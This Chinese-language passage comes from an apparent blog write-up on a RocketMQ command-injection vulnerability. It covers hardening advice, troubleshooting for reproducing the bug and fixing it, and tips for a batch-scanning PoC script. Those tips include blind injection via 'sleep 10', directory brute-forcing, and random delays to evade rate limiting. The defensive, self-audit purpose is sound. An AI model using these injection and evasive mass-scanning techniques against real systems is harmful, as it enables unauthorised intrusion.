安全开发与运维规范长远来看避免此类问题需要建立良好的安全实践输入验证与过滤对所有用户输入进行严格的校验和过滤特别是用于系统命令、文件路径、数据库查询的参数。采用白名单机制是最佳实践。避免直接执行命令尽可能使用SDK、API等安全的方式来替代直接执行系统命令。如果必须执行应使用参数化调用如将命令和参数分开传递而不是拼接字符串。最小权限原则运行RocketMQ服务的系统账户不应具有过高权限如非root。可以考虑创建专用的、权限受限的用户来运行服务。定期安全扫描与更新将中间件纳入资产清单定期进行漏洞扫描并关注其安全公告及时打补丁。纵深防御即使单个组件存在漏洞通过良好的网络分区、微服务间认证、API网关鉴权等纵深防御措施也能有效限制攻击的影响范围。6. 常见问题与排查技巧实录在复现、验证和修复这个漏洞的过程中我遇到了不少典型问题。这里记录下来希望能帮你少走弯路。6.1 漏洞复现阶段问题问题1按照步骤搭建环境后发送POC请求没有反应或返回404。可能原因1漏洞路径或参数不正确。公开的漏洞信息可能不精确或者你使用的RocketMQ版本其脆弱端点路径不同。排查使用dirsearch等工具对目标的:8080端口进行目录爆破。同时尝试抓取一个正常RocketMQ控制台的网络请求观察其API调用模式。可能原因2Docker容器内的服务未正常启动或端口映射错误。排查使用docker logs rmqnamesrv查看NameServer日志确认无报错且显示启动成功。在宿主机上使用netstat -tlnp | grep 8080确认端口处于监听状态。尝试curl http://localhost:8080看是否有任何HTTP响应。可能原因3命令注入存在但无回显盲注。排查尝试时间盲注POC例如注入sleep 10命令观察请求响应时间是否显著增加。问题2POC脚本批量扫描时误报率很高。可能原因特征匹配过于简单。例如仅检测响应中是否包含uid而一些错误页面或默认页可能也包含这几个字母。解决如脚本所示引入随机字符串Nonce进行双重验证。只有同时包含我们本次请求唯一的随机串和命令输出特征才判定为漏洞存在。6.2 POC脚本开发与使用问题问题3扫描速度很慢或者大量目标超时。可能原因1线程数设置过高被目标或中间网络设备限流。解决降低-t参数比如从50降到10或5。可以加入随机延迟time.sleep(random.uniform(0.5, 2))来模拟人工操作规避简单的速率限制。可能原因2目标网络状况不佳或已关机。解决在check_single_target函数中设置合理的TIMEOUT如8-15秒并做好异常捕获避免单个目标卡住整个扫描队列。问题4如何验证POC脚本的准确性方法在本地搭建的漏洞环境和另一个确认已修复/无漏洞的环境如最新版RocketMQ上分别运行脚本。脚本应能准确识别出漏洞环境并对非漏洞环境返回明确的无漏洞信息如“接口不存在”或“无漏洞特征”而不是误报。6.3 修复与加固阶段问题问题5升级RocketMQ版本后Producer/Consumer客户端连接不上。可能原因客户端与服务端版本不兼容。RocketMQ的某些大版本间协议可能有变化。排查检查客户端SDK的版本是否与服务端匹配。查看Broker和NameServer日志通常会有明确的错误信息。RocketMQ社区一般会保持向后兼容但建议升级后对客户端进行充分测试。建议制定灰度升级方案先升级非核心业务的Broker验证无误后再全量升级。问题6限制了HTTP API的访问IP后原有的监控系统无法采集数据了。解决这是安全与便利的权衡。你需要将监控系统的IP地址添加到允许访问的白名单中。如果监控系统部署在动态IP或不可控的网络中可以考虑在监控系统与RocketMQ之间部署一个代理网关网关拥有固定IP并具备认证功能。改用RocketMQ提供的其他监控方式例如通过JMX暴露指标再由Prometheus等监控工具拉取。在整个过程中最深的体会是对于开源中间件“默认不安全”是一个需要时刻牢记的准则。像RocketMQ这样功能强大的组件在追求性能和功能的同时其开箱即用的配置可能并未将安全放在首位。作为运维或架构师在引入任何中间件时除了关注其性能指标和功能特性花时间理解其安全配置、默认开放端口、管理接口的访问控制是必不可少的一步。这个漏洞的POC和验证方法与其说是攻击工具不如说是一面镜子让我们能主动审视自身系统的脆弱点在真正的攻击者到来之前把门牢牢关好。
